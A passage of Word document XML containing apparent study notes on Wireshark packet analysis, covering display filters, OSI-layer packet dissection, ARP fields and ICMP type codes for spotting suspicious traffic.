        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>udp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> eq &lt;Port #&gt; or &lt;Protocol Name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74EE9A" w14:textId="747AAC9C" w:rsidR="009C1171" w:rsidRPr="0084205E" w:rsidRDefault="009C1171" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Helpful in conducting further analysis on a potentially malicious source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CCB31" w14:textId="3B025A2E" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packet Dissection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A6529" w14:textId="24C8BACA" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use of OSI Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B28AEF" w14:textId="694F592C" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packet Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241CE3AC" w14:textId="1980489E" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packets consist of 5-7 layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696EA126" w14:textId="4724DFCA" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. frame/packet; source [MAC]; source [IP]; protocol; protocol errors; </w:t>
      </w:r>
      <w:r w:rsidR="00632640" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">application protocol; application </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00632640" w:rsidRPr="0084205E">
        <w:t>data;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CAA29A3" w14:textId="1BE5B6E3" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Frame (Layer 1) – show frame/packet, details of Physical Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5DE42" w14:textId="1D3D1F72" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Source [MAC] (Layer 2) – show source and destination MAC addresses, from Data Link Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC11E2" w14:textId="202F762E" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Ethernet II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D579B6" w14:textId="0219C353" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Source [IP] – shows source and destination IPv4 Addresses, from Network Layer of the OSI model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3166F336" w14:textId="744BD935" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protocol – shows details of protocol used (TCP/UDP) along with source and destination ports, from the Transport Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8B36D" w14:textId="41E62726" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Transmission Control Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578BD2A" w14:textId="75514853" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protocol Errors – continuation of fourth layer showing specific segments from protocol used above that needed to be reassembled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A508C37" w14:textId="10B1D84F" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Reassembled &lt;TCP/UDP&gt; Segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4125D" w14:textId="69ABB546" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application Protocol – show details specific to the protocol being used such as HTTP, FTP, SMB, etc. – Application Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B563C3B" w14:textId="3C5A8469" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application Data – extension of layer 5 that can show the application specific data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77968A81" w14:textId="19E52D7C" w:rsidR="00632640" w:rsidRPr="0084205E" w:rsidRDefault="00632640" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Line-based text data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EA5F2" w14:textId="413AF7BC" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ARP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3ECACE" w14:textId="2815BAF9" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Address Resolution Protocol – Layer 2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B29ABA" w14:textId="3F91B3BD" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Connects IP addresses with MAC addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A93226" w14:textId="2B4179AD" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Will contain REQUEST and RESPONSE messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5AECD" w14:textId="2C7B63C0" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identified with Request (1) and Response (2) codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE76AC" w14:textId="308ACAEA" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Most devices will ID themselves or be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID’d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> by Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797467A" w14:textId="0CC192FB" w:rsidR="00E067E5" w:rsidRPr="0084205E" w:rsidRDefault="00E067E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Suspicious traffic will likely come from an unrecognized source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79306B71" w14:textId="32652164" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ARP Traffic Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBED4D0" w14:textId="1FB52DC2" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Key things to look for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA00CF" w14:textId="04A92ACB" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Opcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB73E0" w14:textId="1953CF5C" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Operation code – denote request or reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB8B1F" w14:textId="3F46A8B4" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Target MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2E8A5" w14:textId="4CF3C512" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Where request is being sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC3295" w14:textId="265EDEC2" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sender MAC Address and Sender IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094735F" w14:textId="5971D581" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="00AD2419" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F188C41" w14:textId="0DF3E2A9" w:rsidR="00AD2419" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Internet Control Message Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B157B" w14:textId="13E2344C" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Analyze various network nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FCFDEE" w14:textId="0825B53A" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ping </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29A6155D" w14:textId="6FB6432F" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ICMP Traffic Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C57DD" w14:textId="200F917A" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Type and code of the packet are important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104CBD8E" w14:textId="03EF9EB8" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Type = 8 </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> request packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA89DF0" w14:textId="03594628" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Type = 0 </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> reply packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E511C6" w14:textId="0F2FD478" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If either are altered, sign of suspicious activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6A655" w14:textId="56C0D996" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Timestamp and Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F683E89" w14:textId="0EE038BE" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Timestamp provides timeline assistance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED89AB" w14:textId="7CBB34CC" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data is usually a random character string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E55EB6" w14:textId="17F03E60" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy “value”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76959E72" w14:textId="482C0493" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="009144CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB857DD" w14:textId="24BC74B5" w:rsidR="009144CE" w:rsidRPr="0084205E" w:rsidRDefault="00E72ADA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
